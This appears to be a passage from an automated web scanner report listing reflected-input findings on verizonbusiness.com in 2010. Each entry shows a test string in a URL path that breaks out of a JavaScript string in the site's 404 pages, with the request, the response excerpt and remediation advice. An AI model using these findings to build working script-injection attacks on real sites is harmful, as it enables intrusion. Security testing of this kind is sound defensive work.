hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.131. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acab6'%3b674b2b76631 was submitted in the REST URL parameter 3. This input was echoed as acab6';674b2b76631 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-appsacab6'%3b674b2b76631/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:11 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-appsacab6';674b2b76631/app-mgmt/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.132. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2b2d"%3bcaecadb681b was submitted in the REST URL parameter 3. This input was echoed as e2b2d";caecadb681b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-appse2b2d"%3bcaecadb681b/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42333
Date: Wed, 17 Nov 2010 00:40:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-appse2b2d";caecadb681b/app-mgmt/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.133. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b75cf"%3b9b20cbb98b5 was submitted in the REST URL parameter 4. This input was echoed as b75cf";9b20cbb98b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/app-mgmtb75cf"%3b9b20cbb98b5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:18 GMT
Content-Type: text/html
Content-Length: 43319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps/app-mgmtb75cf";9b20cbb98b5/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.134. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bfb0'%3b8189e6f9970 was submitted in the REST URL parameter 4. This input was echoed as 4bfb0';8189e6f9970 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/app-mgmt4bfb0'%3b8189e6f9970/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps/app-mgmt4bfb0';8189e6f9970/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.135. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cc38"%3bebcdf587aaf was submitted in the REST URL parameter 1. This input was echoed as 3cc38";ebcdf587aaf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products3cc38"%3bebcdf587aaf/it/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:29 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40670
Date: Wed, 17 Nov 2010 00:40:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products3cc38";ebcdf587aaf/it/managed-apps/enterprise/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.136. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f485'%3b29c124e2012 was submitted in the REST URL parameter 1. This input was echoed as 1f485';29c124e2012 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products1f485'%3b29c124e2012/it/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products1f485';29c124e2012/it/managed-apps/enterprise/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.137. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1126'%3b6cc6916aa59 was submitted in the REST URL parameter 2. This input was echoed as e1126';6cc6916aa59 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/ite1126'%3b6cc6916aa59/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/ite1126';6cc6916aa59/managed-apps/enterprise/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.138. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a69f2"%3b70c6828dd23 was submitted in the REST URL parameter 2. This input was echoed as a69f2";70c6828dd23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/ita69f2"%3b70c6828dd23/managed-apps/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/ita69f2";70c6828dd23/managed-apps/enterprise/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.139. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fde9"%3b8dc03f90ff4 was submitted in the REST URL parameter 3. This input was echoed as 8fde9";8dc03f90ff4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps8fde9"%3b8dc03f90ff4/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps8fde9";8dc03f90ff4/enterprise/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.140. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe74'%3bfe40590ec48 was submitted in the REST URL parameter 3. This input was echoed as 4fe74';fe40590ec48 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps4fe74'%3bfe40590ec48/enterprise/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42335
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps4fe74';fe40590ec48/enterprise/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.141. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab036"%3ba30048d6ff was submitted in the REST URL parameter 4. This input was echoed as ab036";a30048d6ff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/enterpriseab036"%3ba30048d6ff/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:42:15 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
x.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps/enterpriseab036";a30048d6ff/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.142. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/enterprise/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c5da'%3b8bd782249d9 was submitted in the REST URL parameter 4. This input was echoed as 4c5da';8bd782249d9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps/enterprise4c5da'%3b8bd782249d9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43321
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps/enterprise4c5da';8bd782249d9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.143. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fdb7"%3b524858dde52 was submitted in the REST URL parameter 1. This input was echoed as 7fdb7";524858dde52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7fdb7"%3b524858dde52/it/managed-it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
